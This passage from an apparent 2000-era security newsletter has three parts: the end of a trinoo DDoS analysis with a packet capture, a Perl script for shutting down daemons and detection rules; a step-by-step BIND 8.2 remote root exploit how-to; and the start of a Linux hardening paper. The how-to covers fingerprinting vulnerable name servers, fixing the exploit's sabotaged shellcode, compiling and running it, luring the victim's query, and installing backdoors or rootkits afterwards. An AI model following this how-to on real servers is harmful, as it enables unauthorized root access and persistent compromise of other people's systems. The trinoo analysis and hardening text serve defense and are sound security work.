      flood, UDP flood, SYN flood, and Smurf style attacks, and is
      controlled via commands sent as ICMP_ECHOREPLY (ICMP Type 0) packets.
      It also employs Blowfish encryption, similar to trinoo.  (TFN is
      analyzed in a separate paper).
      
      It is all but guaranteed that these tools will continue to follow this
      trend and evolve into truly robust, covert, and distributed denial of
      service attack tools that employ strong encryption of embedded
      strings, passwords to control execution (possibly with trip wires
      that self-destruct, or wipe the entire system disc, if run in the
      wrong way, or by the wrong person), using encrypted communication
      channels, and communicating using packets posing as protocols like
      ICMP that are difficult to detect or block by firewalls.
      
      --
      David Dittrich <dittrich@cac.washington.edu>
      http://staff.washington.edu/dittrich/                                           
      
      
      
      Appendix A: Example of network session captured with "ngrep"
      ------------------------------------------------------------
      
      The following is an example of what an attack session would look
      like when viewed with "ngrep".
      
      ------------------------------------------------------------------------------
      # ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
      interface: eth0 (192.168.0.200/255.255.255.0)
      filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 )
      match: .*
      #
      U 192.168.0.1:32892 -> 10.0.0.1:31335
        2a 48 45 4c 4c 4f 2a                                  *HELLO*         
      #
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        ff f4 ff fd 06                                        .....           
      ######
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        62 65 74 61 61 6c 6d 6f    73 74 64 6f 6e 65 0d 0a    betaalmostdone..
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 20 76    31 2e 30 37 64 32 2b 66    trinoo v1.07d2+f
        33 2b 63 2e 2e 5b 72 70    6d 38 64 2f 63 62 34 53    3+c..[rpm8d/cb4S
        78 2f 5d 0a 0a 0a                                     x/]...          
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        62 63 61 73 74 0d 0a                                  bcast..         
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        4c 69 73 74 69 6e 67 20    42 63 61 73 74 73 2e 0a    Listing Bcasts..
        0a                                                    .               
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        31 39 32 2e 31 36 38 2e    30 2e 31 2e 20 20 20 0a    192.168.0.1.
        0a 45 6e 64 2e 20 31 20    42 63 61 73 74 73 20 74    .End. 1 Bcasts t
        6f 74 61 6c 2e 0a 74 72    69 6e 6f 6f 3e 20          otal..trinoo>   
      ##
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        6d 74 69 6d 65 72 20 31    30 30 30 0d 0a             mtimer 1000..     
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        6d 74 69 6d 65 72 3a 20    53 65 74 74 69 6e 67 20    mtimer: Setting 
        74 69 6d 65 72 20 6f 6e    20 62 63 61 73 74 20 74    timer on bcast t
        6f 20 31 30 30 30 2e 0a                               o 1000..          
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        62 62 62 20 6c 34 34 61    64 73 6c 20 31 30 30 30    bbb l44adsl 1000
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        6d 74 69 6d 65 72 3a 20    53 65 74 74 69 6e 67 20    mtimer: Setting 
        74 69 6d 65 72 20 6f 6e    20 62 63 61 73 74 20 74    timer on bcast t
        6f 20 31 30 30 30 2e 0a                               o 1000..          
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        6d 73 69 7a 65 20 33 32    30 30 30 0d 0a             msize 32000..     
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        72 73 7a 20 33 32 30 30    30                         rsz 32000         
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        64 6f 73 20 32 31 36 2e    31 36 30 2e 58 58 2e 59    dos 216.160.XX.Y
        59 0d 0a                                              Y..             
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        44 6f 53 3a 20 50 61 63    6b 65 74 69 6e 67 20 32    DoS: Packeting 2
        31 36 2e 31 36 30 2e 58    58 2e 59 59 2e 0a          16.160.XX.YY..  
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        61 61 61 20 6c 34 34 61    64 73 6c 20 32 31 36 2e    aaa l44adsl 216.
        31 36 30 2e 58 58 2e 59    59                         160.XX.YY       
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ##
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        71 75 69 74 0d 0a                                     quit..          
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        62 79 65 20 62 79 65 2e    0a                         bye bye..       
      ###
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        62 65 74 61 61 6c 6d 6f    73 74 64 6f 6e 65 0d 0a    betaalmostdone..
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 20 76    31 2e 30 37 64 32 2b 66    trinoo v1.07d2+f
        33 2b 63 2e 2e 5b 72 70    6d 38 64 2f 63 62 34 53    3+c..[rpm8d/cb4S
        78 2f 5d 0a 0a 0a                                     x/]...          
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        6d 70 69 6e 67 0d 0a                                  mping..         
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        6d 70 69 6e 67 3a 20 53    65 6e 64 69 6e 67 20 61    mping: Sending a
        20 50 49 4e 47 20 74 6f    20 65 76 65 72 79 20 42     PING to every B
        63 61 73 74 73 2e 0a                                  casts..         
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        70 6e 67 20 6c 34 34 61    64 73 6c                   png l44adsl     
      ##
      U 192.168.0.1:32894 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 3e 20    50 4f 4e 47 20 31 20 52    trinoo> PONG 1 R
        65 63 65 69 76 65 64 20    66 72 6f 6d 20 31 39 32    eceived from 192
        2e 31 36 38 2e 30 2e 31    0a                         .168.0.1
      ##
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        71 75 69 74 0d 0a                                     quit..          
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        62 79 65 20 62 79 65 2e    0a                         bye bye..       
      ------------------------------------------------------------------------------
      
      
      Appendix B - trinot script
      --------------------------
      
      -------------------------------  cut here  -----------------------------------
      #!/usr/bin/perl -w
      #
      # trinot v. 1.1
      # By Dave Dittrich <dittrich@cac.washington.edu>
      # 
      # Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
      # to all their masters, exit, etc.  Using this program (and knowledge
      # of the proper daemon password), you can affect trinoo daemons
      # externally and monitor packets to verify if the daemons are up,
      # expose their masters, or shut them down.
      #
      # Needs Net::RawIP (http://quake.skif.net/RawIP)
      # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
      #
      # Example: ./trinot host1 [host2 [...]]
      #          ./trinot -S host
      #          ./trinot -p password -P host
      #
      # (This code was hacked from the "macof" program, written by
      # Ian Vitek <ian.vitek@infosec.se>)
      
      require 'getopts.pl';
      use Net::RawIP;
      
      $a = new Net::RawIP({udp => {}});
      chop($hostname = `hostname`);
      
      Getopts('PSDp:f:s:d:l:i:vh');
      die "usage: $0 [options] host1 [host2 [...]]\
      \t-P\t\t\tSend \"png\" command\
      \t-S\t\t\tSend \"shi\" command\
      \t-D\t\t\tSend \"d1e\" command (default)\
      \t-p password\t\t(default:\"l44adsl\")
      \t-f from_host\t\t(default:$hostname)\
      \t-s src_port\t\t(default:random)\
      \t-d dest_port\t\t(default:27444)\
      \t-l ipfile\t\tSend to IP addresses in ipfile\
      \t-i interface \t\tSet sending interface (default:eth0)\
      \t-v\t\t\tVerbose\
      \t-h This help\n" unless ( !$opt_h );
      
      # set default values
      $opt_i = ($opt_i) ? $opt_i : "eth0";
      $s_port = ($opt_s) ? $opt_s : int rand 65535;
      $d_port = ($opt_d) ? $opt_d : 27444;
      $pass = ($opt_p) ? $opt_p : "l44adsl";
      
      # choose network card
      if($opt_e) {
        $a->ethnew($opt_i, dest => $opt_e);
      } else {
        $a->ethnew($opt_i);
      }
      
      $cmd = ($opt_P) ? "png $pass" :
             ($opt_S) ? "shi $pass" :
             ($opt_D) ? "d1e $pass" :
             "d1e $pass";
      $s_host = ($opt_f) ? $opt_f : $hostname;
      
      if ($opt_l) {
        open(I,"<$opt_l") || die "could not open file: '$opt_l'";
        while (<I>) {
          chop;
          push(@ARGV,$_);
        }
        close(I);
      }
      
      foreach $d_host (@ARGV) {
        $a->set({ip => {saddr => $s_host, daddr => $d_host},
                 udp => {source => $s_port, dest => $d_port, data => $cmd}
                });
        print "sending '$cmd' to $d_host\n" if $opt_v;
        $a->send;
      }
      
      exit(0);
      -------------------------------  cut here  -----------------------------------
      
      
      Appendix C - References
      -----------------------
      
      TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary
      R. Wright., Addison-Wesley.
      
      lsof:
              ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
      
      tcpdump:
      
              ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
      
      hunt:
              http://www.cri.cz/kra/index.html
      
      sniffit:
              http://sniffit.rug.ac.be/sniffit/sniffit.html
      
      ngrep:
              http://www.packetfactory.net/ngrep/
      
      loki client/server:
              Phrack Magazine, Volume Seven, Issue Forty-Nine,
              File 06 of 16, [ Project Loki ]
              http://www.phrack.com/search.phtml?view&article=p49-6
      
              Phrack Magazine  Volume 7, Issue 51 September 01, 1997,
              article 06 of 17 [ L O K I 2   (the implementation) ]
              http://www.phrack.com/search.phtml?view&article=p51-6
      
      LibNet:
              http://www.packetfactory.net/libnet/
      
      Net::RawIP:
              http://quake.skif.net/RawIP
      
      crack:
              http://www.crypto.dircon.co.uk/
      
      Password cracking utilities:
              http://packetstorm.securify.com/Crackers/
      
      targa.c:
              http://packetstorm.securify.com/exploits/DoS/targa.c
      
      
      
      Appendix D - Abbreviated report of actual trinoo attack.
      ------------------------------------------------------
      
      The following is an abbreviated version the initial report sent out by
      Susan Levy Haskell of the University of Minnesota.  This report,
      which only concerns a small time span in the three day attack, showed
      227 unique attacking systems, 114 of which were at Internet 2 sites.
      (The actual list of attacking systems, all of which are also root
      compromised victims in their own right, have been removed. A complete
      report of all unique attacking IP addresses over the three day period
      is not available.)
      
      Just to show what a large trinoo network could do, consider that a file
      (named "owned.log") containing 888 IP addresses was found same location
      as the trinoo source code analyzed here (which is assumed to be the same
      code as that used for the attack).  Another file in that directory
      (named "216") contains addresses of 10549 systems on 216.0.0.0/8
      netblocks, and is assumed to be a list of potential targets for
      compromise and trinoo daemon/master installation.  Rumors on Usenet
      newsgroups and Slashdot put the number of systems controlled by this
      group in the 3000+ range.
      
      ----------------------------------------------------------------------------
      Hello:
      
      This is a notification that a system at your site apparently was used in
      a large-scale UDP flood on a system at the University of Minnesota.  The
      hosts below have been involved in a series of escalating large-scale
      denials-of-service that are flooding the University of Minnesota off the
      internet.  They are periodic, but expanding in the number of hosts used
      to attack.
      
      We would like to hear about it if you can confirm whether your system(s)
      were used.  We're also *very* interested in any information about this
      tool (since it appears to be new, and quite effective).  Thus far, all
      hosts used in this attack appear to have been Solaris 2.x systems that
      were compromised using the recently-announced rpc.cmsd exploits (see
      http://www.cert.org/advisories/CA-99-08-cmsd.html for details).
      
      The following are lists of hosts apparently used, and the period of use.
      We're certain about the timestamps--they're in CDT (-500)--but as with 
      all such floods, they ramp up and tail off.  Since we're getting data in 
      ten-minute slices, the times are approximate.  
      
      The floods use unforged source IPs and consistent UDP source-ports.  The
      destination ports are random, aimed at 160.94.196.192.
      The packets are 32-byte UDP (and each flow represents many packets).
      
      I've included profile information below, rather than log excerpts,
      because these run to many GB.  If you would like Cisco net-flow excerpts
      to demostrate the behavior, please reply to this message & ask.
      
      All attacks have been launched at 160.94.196.192 (irc2.tc.umn.edu).
      And, as I mentioned, all times are in CDT (-500) from an ntp-slaved log
      host (for the ten-minute segments).
      
      Thank you.
      
      -susan
      --
      Susan B. Levy Haskell   /  sblh@nts.umn.edu  /   voice: (612) 626-8639
      Security Incident Response Coordinator             fax: (612) 626-1002  
      Networking and Telecommunications Services,    University of Minnesota
      *** To report a security incident in progress, call (612) 625-0006 ***
      =================================================
      
      
      Appendix E - Further methods of detecting trinoo
      ------------------------------------------------
      
      Authors: David Brumley <dbrumley@stanford.edu>
               David Dittrich <dittrich@cac.washington.edu>
               George Weaver <gmw@psu.edu>
      
      Detecting Trinoo
      
      Currently Trinoo has several signatures that allow it to be detected from
      IP flow records.  
      
      Trinoo Daemon (ns.c) -
      1. The trinoo daemon by default listens to UDP port 27444
      2. All communication with the trinoo daemon must have the string l44
      (ell 44).
      3. The SYN flood mechanism picks the destination port via the following
      algorithm:
              to.syn_port = htons(rand() % 65534)
      
         Several observations can be made:
              a. randomize()/srandom() is never called, so the destination port
                 will always fit the following algorithm:
                 SYN packet 1 has destination port x
                 SYN packet 2 has destination port y as defined by
                       srandom(x); y = rand();
                 SYN packet 3 has destination port z as defined by
                       srandom(y); z = rand();
              b. Since the port is a result of modulus 65534, destination port 0
                 will show up, while destination port 65535 will not.
      
      IDS detection of daemon:
      1. Look for UDP connections to destination port 27444. This is indicative
      of the control session.
      2. The string l44 will determine with a large probability that the packet
      is part of a trinoo control session.
      3. Running trinoo DoS attacks (SYN Floods) can be identified by the
      algorithm given in 3 above.  In addition, if you can catch the first SYN,
      it will *always* be the result of srand(1); rand();. On one authors
      laptop, an example sequence of destination ports would be:
              32540
              48264
              58208
              56084
              46021
              37263
              6890
              38941
              17766
              40714
      
      Although this doesn't stop the Denial of Service, it will say with some
      probability this is a trinoo attack, and you should start looking for a
      master!
      
      Detecting the trinoo daemon on your network:
      1. Trinoo daemons can be indexed by a master by sending a png command.
      Live daemons will respond with a PONG. The original author probably added
      this so the master can see which daemons are still alive.  You can scan a
      network with the attached program for anything that responds appropriately
      (which chances are is a trinoo daemon).
      
      Trinoo Server (master.c) -
      The network communications that are indicative of a trinoo server are:
      1. Sending UDP packets with destination port 27444
      2. UDP packets as described above with the string l44adsl (ell 44 a d s
      ell)
      3. A server will bind to port 27665
      
      IDS detecting the trinoo server:
      1. Look for flows with protocol type 17 (UDP)
      2. TCP connections (protocol type 6) to destination port 27665 (the trinoo
      server)
      
      Detecting the Trinoo server of your network:
      1. The server password hasn't changed (to the best of the authors
      knowledge), nor has the port it listens to.  Trinoo possible masters can
      be detected by using a tool like nmap to find hosts listening to port
      27665, i.e.
              nmap -PI -sT -p 27655 -m logfile "you.subnet.*.*"
      After a list of possible servers has been compiled, automated login can be
      used for positive identification.  If you wish to script the automated
      login, try netcat (nc on most systems), i.e.
              echo "betaalmostdone" | nc <IP> 27665
      
      NOTE:
      Your mileage may vary with the random number prediction since it's very
      host specific - what does rand() really return?  Consult your
      documentation.
      
      @HWA
      
308.0 [IND] Remote root exploit HOW-TO by E-mind
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
            
          +-------------------------------------------------------+
          |BIND 8.2 - 8.2.2 *Remote root Exploit How-To* by E-Mind|
          +-------------------------------------------------------+
      
      
      (A) What is a DNS?
      
            1. How do I query a DNS?
            2. How do I find a vulnerable DNS?
      
      
      (B) How do I edit DNS entries?
      
            1. How do I find a Zone file?
            2. How do I edit a Zone file?
      
      
      (C) How do I exploit a vulnerable machine
      
            1. What do I need to obtain before I could use the exploit?
            2. What is the theory behind the exploit?
            3. Where do I get the exploit from?
            4. Why should I patch the exploit?
            5. How do I patch the exploit?
            6. How do I compile the exploit?
            7. How do I run the exploit?
            8. How do I make the vulnerable server make a query to my ip?
            9. What should I do before I leave the shell?
      
      
      (D) Who should be credited for this HowTo?
      
            1. Who is the person that motivated me into writing this?
            2. Who am I?
            3. Can I distribute/change this HowTo?
            4. Final Credits and Greets :)
      
      
      Section A - What is a DNS?
      --------------------------
      
         A DNS - Domain Name Server, is used to convert host names to IP addresses
         and IP addresses to host names.
         for example: www.infoseek.com = 204.162.96.173
      
            1. How do I query a DNS?
               First of all, you should probably know that when you configure your
               TCP/IP and wish to use hostnames in your web browser to get to a web
               site, instead of typing the IP address of that site, you would need
               to configure a DNS server. You will get your DNS server IP address
               from your ISP. To make queries to the DNS server, Unix systems
               (and NT) has a tool calls "nslookup", the syntax of that tool is:
               $nslookup <hostname>
               or
               $nslookup <ip>
               A properly configured DNS server contains two "lists" for a domain
               called the Zone files. One zone file is used for hostname to IP
               resolution, and the other is used for reverse lookup or IP to Hostname
               resolution. "nslookup" can be used in an interactive way, this is the
               way we will work with, as it is more powerful. Just type nslookup at
               the shell and press enter. You will get a ">" prompt, from which you
               can start typing in IP addresses and hostnames. There are some
               commands in nslookup which we will discuss later in this howto that
               will allow you to get some more information.
      
            2. How do I find vulnerable systems?
               Remember, we will exploit Name Servers.
               We first need to find out the version of the DNS service that runs on
               a remote host. As well, we will need to know the Operating System, but
               there are many HowTo`s on that. We will use a tool called "dig", which
               is available on most Unix systems. The syntax looks like this:
               $dig @<victim_ip> version.bind chaos txt | grep \"8
               look at the output. If you see: 8.2 or 8.2.1 or 8.2.2 then it is
               vulnerable. If you see 8.2.2P2 - P5, it is not.
               If you don't get an output and you just see your terminal stuck, it
               means that the DNS admin has probably edited the source so that the
               server won't give you this information. IT COULD BE VULNERABLE.
      
      
      Section B - How do I edit DNS entries?
      --------------------------------------
      
         The first thing you should know is, DNS is only text files, and entries are
         added or changed by editing those text files and restarting the service.
         The main file that controls the DNS service is /etc/named.conf or
         /etc/named.boot. If /etc/named.conf exists, that is the file you should be
         working with.
      
            1. How do I find a Zone file?
               As I said earlier, a properly configured DNS has two "lists" or zone
               files for each domain it serves.
               you will need to edit that zone file to change or add entries to that
               domain. A domain is for example, infoseek.com, and a hostname is www,
               the FQDN is www.infoseek.com. FQDN stands for Fully Qualified Domain
               Name. To find the zone file for FQDN to IP for infoseek.com domain,
               we should first query our DNS server to tell us what is the primary
               DNS for infoseek.com. This is how it is done:
               
               $nslookup
               Default Server:  xxxxxx.xxxxxxx.xx.xx
               Address:  xxx.xx.xx.xx
               >set q=ns<ENTER>
               >infoseek.com<ENTER>
               >infoseek.com      nameserver = NS-UU.infoseek.com
               >NS-UU.infoseek.com    internet address = 198.5.208.3
      
               As you can see, now we have the ip address of the name server of
               infoseek.com. Let us suppose that we are root there.
               We SSH to their DNS, and locate the file /etc/named.conf
               We view the file and we see at the top an options section.
               there is a line there that says:
               directory "/var/named"
               This means, that the zone files will sit in /var/named.
               We further look down the file and we see some zone sections,
               We see a zone for infoseek.com which looks like:
      
               zone "infoseek.com"{
                    type master;
                    file "infoseek.com.zone";
               };
      
               As we can understand now, the zone file is:
               /var/named/infoseek.com.zone, and that is the file which we should
               edit.
      
            2. How do I edit a Zone file?
               First, let's take a look at that zone file.
               We see at the top a SOA record, which probably looks to you like a
               block of garbage text at the top.
               then, we see something like:
               
               @                 IN     NS      NS-UU.infoseek.com.
               www               IN     A       204.192.96.173
               ftp               IN     CNAME   corp-bbn
               corp-bbn          IN     A       204.192.96.2
               .
               .
               .
               
               As we can see, there are several types of records, for our exploit to
               work, we only need to focus on one record, which is NS.
               An A record is the typical Hostname to IP record type.
               CNAME is a Canonical Name, which is an Alias to an A record.
               A PTR record is a Pointer record, which is the oposit of A, it points
               IP addresses to FQDN`s. PTR`s are used in the "other" zone file.
               We will not discuss about it here but it is recommended that you read
               about DNS, there are many good books about DNS out there, read one.
               An NS record is a Name Server record type which says what is the Name
               Server for a specific domain or sub-domain.
               As you might have noticed, the NS record NS-UU.infoseek.com ends with
               a ".".
               This is because we specified the FQDN and not the hostname.
               When the period is omitted, the domain name is added after the
               hostname and if we where to omit the last period, it would be like we
               have said:
               NS-UU.infoseek.com.infoseek.com.
               So instead of:
      
               www                    IN      A       204.192.96.173
               we could write:
               www.infoseek.com.      IN      A       204.192.96.173
               Which is the same thing.
               
               For our exploit to work, we will need to add a sub-domain to a name
               server on the net. So let's again suppose that we are root at
               NS-UU.infoseek.com.
               
               How do we add a sub-domain?
               We just need to add another NS record.
      
               subdomain              IN      NS      hacker.box.com.
      
               this means that the name server of the domain subdomain.infoseek.com
               would be hacker.box.com.
               hacker.box.com needs to be resolved to a your machine's IP address, so
               enter your FQDN instead.
               Now, we need to restart the name server so the changes will take
               effect.
               initiate the following command:
               
               #/usr/sbin/ndc restart<ENTER>
               new pid is 24654
               #
      
      
      Section C - How do I exploit a vulnerable machine
      -------------------------------------------------
      
            1. What do I need to obtain before I could use the exploit?
               First of all, 3 brain cells. ;p
               You will also need root privileges on a PRIMARY Name Server on the
               Internet which is Authoritative for a Domain on the net.
               Also, you will need a machine from which you will run the exploit.
               As for the DNS requirement, you could also ask someone that has root
               privileges on such a DNS, to edit the zone files for you.
      
            2. What is the theory behind the exploit?
               The exploit uses a Buffed Overflow in BIND versions 8.2 - 8.2.2 to
               gain a remote root shell.
               The exploit binds to port 53 on the local machine, and acts as a DNS
               server. When someone queries it, it will send a large NXT record that
               contains code that will exploit the remote BIND server,
               provided that it is a vulnerable machine.
               To get more information on how Buffer Overflows work, *PLEASE* read
               Aleph One`s exelent article:
               
               Phrack 49 Article 14 - Smashing The Stack For Fun And Profit.
               URL: http://www.phrack.com/search.phtml?view&article=p49-14
      
            3. Where do I get the exploit from?
               http://www.hack.co.za/daem0n/named/t666.c
      
            4. Why should I patch the exploit?
               You might have heard that one needs to patch the exploit to make it
               work. This is because ADM thought only elite hax0rs should use their
               exploit and so, they planted a small "bug" in the code.
               What they actually did, is change the shell codes so that instead of
               running /bin/sh, the exploit will run /adm/sh.
      
            5. How do I patch the exploit?
               As you may see, only a small change needs to be done in the code.
      
               / = 2F(HEX)   ===>  / = 2F(HEX)
               a = 61(HEX)   ===>  b = 62(HEX)
               d = 64(HEX)   ===>  i = 69(HEX)
               m = 6D(HEX)   ===>  n = 6E(HEX)
               / = 2F(HEX)   ===>  / = 2F(HEX)
      
               So, all we need to do, is search the source code for
               0x2f,0x61,0x64,0x6d,0x2f and replace it with 0x2f,0x62,0x69,0x6e,0x2f
      
               Done.
      
            6. How do I compile the exploit?
               As always:
               $gcc t666.c -o t666<ENTER>
               $
      
            7. How do I run the exploit?
               $su<ENTER>
               Password:<password><ENTER>
               #./t666 1<ENTER>
               
               Now the exploit is bound to port 53 (if you run a DNS server on the
               machine you want to run the exploit on, you must first kill the name
               server, use: #killall -9 named)
               The exploit is now waiting for queries, the second someone will query
               your exploit machine you will get an output:
               Received request from xxx.xx.xx.xx:1025 for xxx.xxxxxxxxx.xx.xx type=1
               If it was a DNS server, it would enter a proxy loop, and if it is a
               vulnerable server, running on Linux Redhat 6.x    - named 8.2/8.2.1
               (from rpm) (this is because we chose architecture 1, type ./t666
               without arguments and you will get a list of the architectures that
               the exploit will work on, I have tried it on Redhat linux only, so
               don't ask me why solaris doesn't work, I don't have a solaris to test
               it on, nor do I have the time to put more effort on this exploit.)
               You will get a remote root shell.
      
            8. How do I make the vulnerable server make a query to my ip?
               This is very easy now, once you have added a subdomain in a name
               server on the net and made yourself its DNS, the only thing left to
               do, is query the vulnerable server for a host inside the added
               subdomain.
      
               $nslookup
               >server <victim><ENTER>
               >www.subdomain.infoseek.com<ENTER>
      
               What will happen, is the server will ask, in this case
               NS-UU.infoseek.com for the IP of www.subdomain.infoseek.com.
               NS-UU.infoseek.com will start searching and will get to subdomain,
               because subdomain has its OWN NS record, it will tell <victim> that
               hacker.box.com. (your hostname in this case) is the Authoritative Name
               Server for subdomain.infoseek.com. Now, what will happen, is that
               <victim> will query hacker.box.com, for the ip address of
               www.subdomain.infoseek.com. BOOM! :)
      
            9. What should I do before I leave the shell?
               When you exploit BIND, it will crash named, so you need to add some
               kind of a back door so you could log back in and restart it.
               *DO NOT TRY TO RESTART IT WHITHIN THE SHELL.*
               There are plenty of trojans and rootkits you could install on the
               server, I leave that to you.
      
      
      Section D - Who should be credited for this HowTo?
      --------------------------------------------------
      
            1. who is the person that motivated me into writing this?
               That person is no other the gov-boi, he operates the great site
               www.hack.co.za. Without him, this How-To would have never been writen!
               Thanks Gov-Boi :)
      
            2. whoami?
               I am E-Mind, you can find me on IRC (EFNet)
               I am not giving away my E-Mail, and will not answer stupied questions.
               I think I have provided everything you need to RUN the exploit in this How-To.
               If not, and if you find errors, PLEASE /msg me on IRC.
      
            3. can I distribute/change this HowTo?
               I take no responsibility for your actions.
               You are free to do whatever you want with this file
      
               *AS LONG AS "SECTION D" REMAINS UNTOUCHED*
      
            4. Final Credits and Greets :)
      
               Credits:
               
               Gov-Boi - Keep up the good work man! ;p
               
               Aleph One - no other article out there explains buffer overflows
                           better then yours!
               
               ADM - for writing this cool exploit.
      
      
               Greetz:
      
               #myth!, #!glich, #972, #darknet, #feed-the-goats -  `sup guyz? ;]
      
      
      EOF

309.0 [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Preparing your linux box for the Internet 
      Armoring Linux 

      Lance Spitzner 
      http://www.enteract.com/~lspitz/papers.html 
      Last Modified: 25 June, 2000 
      
      Organizations throughout the world are adopting Linux as their production 
      platform.   By connecting to the Internet to provide critical services, 
      they also become targets of opportunity.  To help protect these Linux 
      systems, this article covers the basics of securing a Linux box.  The 
      examples provided here are based on Red Hat 6.0, but should apply to most 
      Linux distributions. 

      Installation       The best place to start in armoring your system is at 
      the beginning, OS installation. Since this is a production system, you 
      cannot trust any previous installations. You want to start with a clean 
      installation, where you can guarantee the system integrity. Place your 
      system in an isolated network. At no time do you want to connect this box 
      to an active network nor the Internet, exposing the system to a possible 
      compromise. I personally witnessed a system hacked by a script kiddie 
      within 15 minutes of connecting to the Internet. To get critical files and 
      patches later, you will need a second box that acts as a go between. This 
      second box will download files from the Internet, then connect to your 
      isolated, configuration "network" to transfer critical files or burn the 
      patches to a CDROM. 

      Once you have placed your future Linux box in an isolated network, you are 
      ready to begin. The first step is selecting what OS package to load. As of 
      RH 6.0, you have three options, Workstation, Server, and Custom (default).  
      I highly recommend Custom, as this       allows you to choose what 
      services are added and how the system is partitioned.  The idea is to load 
      the minimum packages, while maintaining maximum efficiency.   The less 
      software that resides on the box, the fewer potential security exploits or 
      holes.  This means if you do not need a News or Real Audio Server, don't 
      install it.  The nice thing about Linux is, if you change your mind, it is 
      easy to add packages later.  Regardless of which installation you choose, 
      I would add the manual pages and HOWTO docs.  I find the on-line man pages 
      and docs to be a critical resource that add little risk to your system. 

      If you selected Custom, you will be asked to partition your system.  I 
      always like to make root as big as possible and just throw everything in 
      there, then you do not run out of room in the future.  However, we do need 
      several partitions to protect the root drive.  If we       were to fill 
      the root partition with data, such as logging or email, we would cause a 
      denial of service, potentially crashing the system. 

      Therefore, I always recommend a separate partition for /var, this is where 
      all the system logging and email goes.  By isolating the /var partition, 
      you protect your root partition from overfilling.   I've found 400 MB to 
      be more then enough for /var (increase this if your       system will have 
      alot of mail) .  You may also consider making a separate partition for 
      specific application purposes, especially applications that store 
      extensive logging. If you are going to have users on your system you do 
      not trust, you may also want to create a seperate /home directory, so 
      malicious users cannot fille the / partition. For a standalone server, 
      your partitions may look as follows: 
      
      /        - everything else 
      /var     - 400 MB 
      swap     - (I normally go with 256 MB) 
        
      
      Once the system has rebooted after the installation, be sure to install 
      the recommend security patches. For Red Hat, you can find these security 
      patches at Red Hat's errata support site.  Patches are critical to 
      armoring a system and should always be updated. bugtraq@securityfocus.com 
      or redhat-watch-list-request@redhat.com are excellent sources for 
      following bugs and system patches.  Without these patches, your system can 
      be easily compromised.  Be sure to use your go between box to get the 
      patches, the Linux box should always remain on an isolated network. . For 
      Red Hat, once you download the rpm, you can easily update your system 
      using the following syntax.  An excellent example of this is the security 
      update for wu-ftpd 
      
      rpm -Uvh wu-ftpd-2.6.0-14.6x.i386.rpm 
      
      For systems that are already on-line, you can ftp the rpm and install it at
      the same time, using the following syntax. 
      
      rpm -Uvh ftp://updates.redhat.com/6.1/i386/wu-ftpd-2.6.0-14.6x.i386.rpm 
      
      As of RH 6.1, there is a new utility for patches called 'up2date'. I 
      highly recommend you try this excellent utility. When ran on a local 
      system, it determines which .rpm's need to be updated, gets those rpm's 
      from Red Hats's web site, and then downloads and installs the updated 
      files. This tool is highly customizable and easy to use. 

      Eliminating Services       Once you have loaded the installation package, 
      patches, and rebooted, we are now ready to armor the operating system. 
      Armoring consists mainly of turning off services, adding logging, tweaking 
      several files, and configuring TCP Wrappers. First we will begin with 
      turning off services. 

      By default, Linux is a powerful operating system that executes many useful 
      services. However, most of these services are unneeded and pose a 
      potential security risk. The first place to start is /etc/inetd.conf. This 
      file specifies which services the /usr/sbin/inetd       daemon will listen 
      for. By default, /etc/inetd.conf is configured for a variety of services, 
      you most likely only need two, ftp and telnet. You eliminate the remaining 
      unnecessary services by commenting them out (example A).  This is 
      critical, as many of the services run by inetd pose serious security 
      threats, such as popd, imapd, and rsh.  Confirm what you have commented 
      out with the following command (this will show you all the services that 
